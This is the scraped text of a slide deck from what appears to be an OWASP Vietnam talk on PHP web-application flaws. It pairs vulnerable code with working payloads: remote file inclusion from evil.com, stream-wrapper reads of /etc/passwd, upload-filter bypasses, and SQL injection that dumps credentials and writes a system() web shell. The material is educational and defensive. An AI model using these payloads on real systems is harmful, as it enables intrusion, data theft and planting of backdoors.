狠狠撸

OWASP VIETNAM

H4x0rs gonna Hack
Fix or be pwned!

Who?
? manhluat (ML)
? Web -App Security Pentester
Contact me ...maybe?!
? https://twitter.com/manhluat93
? manhluat93.php@gmail.com
@tks to g4,w~

Trust something!
$GLOBALS
$_SERVER
$_GET
$_POST

$_FILES
$_COOKIE
$_SESSION
$_REQUEST
$_ENV

$_SERVER
$_SERVER[‘HTTP_HOST’]
Host: somethingevil

$_SERVER
$_SERVER[‘REQUEST_URI’]
curl "http://localhost/test/http://evil/../../../../test/http_host.php"
[REQUEST_URI] => /test/http://evil/../../../../test/http_host.php

$_SERVER[‘PHP_SELF’]
curl "http://localhost/test/http_host.php/somethingevil"
[PHP_SELF] => /test/http_host.php/somethingevil

$_GET $_POST $_COOKIE
base64_decode($_GET['x']);

GET: ?x[]=evil
POST: x[]=evil
COOKIE: x[]=evil;

strcmp,strncmp,strcasecmp
if(strcmp($_GET[‘x’],$password)==0)
echo “Ok”;

?x[]=1

Zend/zend_builtin_functions.c

<? if(NULL==0) echo ‘OK’; ?>
// output: OK

//Source: /admin/index.php
if($_SESSION[‘login’] != ‘admin’){
header(“Location: login.php”);
}
echo "ADMIN Cpanel";
// ADMINCP functions … Add-Edit blah blah...

cURL is your friend ;)$

curl
http://localhost/admin/index.php -ik
HTTP/1.1

302 Found
Date: Mon, 16 Dec 2013 00:50:41 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.9-4ubuntu2.3
Location: login.php
Vary: Accept-Encoding
Content-Length: 119
Content-Type: text/html
 
Notice: Undefined variable: _SESSION in index.php on line 3 
ADMIN Cpanel

PHP Streams
fopen
file_get_contents
readfile
include (include_once)
require (require_once)

PHP Stream Wrappers
?x=file:///etc/passwd
?x=data://,evil
?x=php://filter/convert.base64encode/resource=index.php

<?php file_get_contents($_GET[‘x’]); ?>

if(!preg_match(‘#http://www.google.com#is’,$url))
die(‘FAILED’);
include($url);

?url=data://text/html;charset=http://www.google.com,evil();
//TimThumb is a popular script used for image resize.
//Public Exploit for v 1.32 (08/2011):
http://www.exploit-db.com/exploits/17602
…

if ($url_info['host'] == 'www.youtube.com' || …)

?url=data://www.youtube.com/html;,evil();

...
include($_GET[‘lang’].”.txt”);
...

with allow_url_include=on
?lang=http://evil.com/backdoor?
lang=data://,system(‘ls’);#

...
include($_GET[‘lang’].”.txt”);
...
allow_url_include=off
If you have a zip file on target host which includes “evil.txt”?
lang=zip:///tmp/evil.txt.zip#evil?lang=//192.168.1.1//evil

File Upload Script
if($_FILES[‘file’][‘type’] == ‘image/gif’)

Do not trust Content-Type!

Blacklist Filter
if(preg_match(‘#.php$#’,$filename))
die(‘HACKER’);
...
strpos($filename,’php’);
...

evil.PHP
evil.PhP
evil.php5 (preg_match)

Whitelist Filter
...
$allow_type = array(‘jpeg’,’gif’,’png’);
$ext = explode(‘.’,$filename);
$ext = $ext[1];
if(in_array($ext,$allow_type))
move_uploaded_file...

evil.jpeg.php
evil.gif.php

serialize
serialize(1337); // Output: i:1337;
serialize(“OWASP”); //Output: s:5:"OWASP";
serialize(array(‘a’=>’A’));
//Output: a:1:{s:1:"a";s:1:"A";}serialize(new Foo());
//Output: O:3:"Foo":1:{s:4:"name";s:2:"ML";}
unserialize(‘a:1:{s:1:"a";s:1:"A";}’);
//Output: Array(‘a’=>’A’);unserialize(‘O:3:"Foo":1:
{s:4:"name";s:2:"ML";}’);
//Output: Foo Object ( [name] => ML )

Magic Methods
__construct(), __destruct(), __call(),
__callStatic(), __get(), __set(),
__isset(), __unset(), __sleep(),
__wakeup(), __toString(), __invoke(),
__set_state() and __clone()

__construct()Gets called when a new object
is created.
__destruct()Called when there are no more
references to an object or when an object
is destroy
__wakeup()Unserialize() triggers this to
allow reconstruction of resources to be
used

CVE: 2012-5692Invision Power Board <= 3.3.4 "unserialize
()" PHP Code Execution

Joomla! <= 3.0.2 (highlight.php) PHP Object
Injection Vulnerability
CubeCart <= 5.2.0 (cubecart.class.php) PHP Object
Injection Vulnerability
http://vagosec.org/2013/12/wordpress-rce-exploit
http://prezi.com/5hif_vurb56p/php-object-injection

This is how you prevent!
<?="<img src=/slideshow/h4x0rs-gonna-hack-29481005/29481005/& />";?>

FAILED :(

$input = $_GET['input'];
$input = preg_replace('#</*.+?>#','',$input); // remove
<tag>
$input = preg_replace('#s#','',$input); // remove space
echo "<input type='text' name='vuln' value='".$input."' />";

CSRF (Cross-site request forgery)

?password=evil&confirm_password=evil&submit=Change%20Password

Real-World
http://pyx.io/blog/facebook-csrf-leading-to-full-account-takeoverSo, the
course of action to take over victim's account would be:
1. Use "Find contacts on Facebook" from attacker account and log all
requests
2. Find /contact-importer/login request
3. Remove added email from your (attacker) account
4. Get the victim to somehow make the /contact-importer/login request
(infinite possibilities here)
5. Email is now added to victim's account, silently
6. Use "Forgot your password" to take over the account

SQL Injection
…
mysql_query(‘SELECT * FROM news WHERE id = ‘.$_GET[‘id’]);
...

…
mysql_query(‘SELECT * FROM users WHERE name = “‘.$_GET[‘id’].’”’;);
...

…
mysql_query(‘SELECT * FROM news WHERE content LIKE “%‘.$_GET[‘id’].’%”’;);
...

Dump database:
● ?id=1 UNION SELECT version(),null
● ?id=1 UNION SELECT username,password FROM
administrator
● ?id=1 UNION SELECT )numberno,name FROM
creditcards

DoS:
● ?id=1 UNION SELECT benchmark(1,999999),null

Write/Read File (with file_priv = 1):

● ?id=1 UNION SELECT load_file(‘/etc/passwd’),null
● ?id=1 UNION SELECT “<?=system($_GET[x])?>”,null
INTO OUTFILE ‘/var/www/backdoor.php’

htmlspecialchars,htmlentities
$input = ‘123 ' " < > ’; // 123 ‘ “ < >
htmlspecialchars($input,ENT_QUOTES); //Output: 123 ' " < >
htmlentities($input,ENT_QUOTES); //Output: 123 ' " < >

$username = htmlentities($_POST[‘username’],ENT_QUOTES);
$password = htmlentities($_POST[‘password’],ENT_QUOTES);
SELECT * FROM users WHERE username=”$username” AND password=”$password”

?username=
&password= OR 1-===>... WHERE username=”” AND password=” OR 1--”

mysql_real_escape_string
mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends
backslashes to the following characters: x00, n, r, , ', " and x1a.
This function must always (with few exceptions) be used to make data safe before sending a query
to MySQL.

$id = mysql_real_escape_string($_GET[‘id’]);
mysql_query(‘SELECT * FROM news WHERE id = ‘.$id);
...

!!???
?id=1 UNION SELECT version(),null

$type = mysql_real_escape_string($_GET[‘type’]);
mysql_query(‘SELECT * FROM news WHERE

`‘.$type.’`=1’);

mysql_real_escape_string`...` is it a
string ?!...NO
?type=anytype`=1 UNION SELECT
version(),null--

SELECT * FROM users WHERE user LIKE ’{$user}’ AND password LIKE ‘{$pass}’;

?user=admin&password=%

狠狠撸

H4x0rs gonna hack

Recommended

More Related Content

What's hot (6)

Similar to H4x0rs gonna hack (20)

Recently uploaded (20)

H4x0rs gonna hack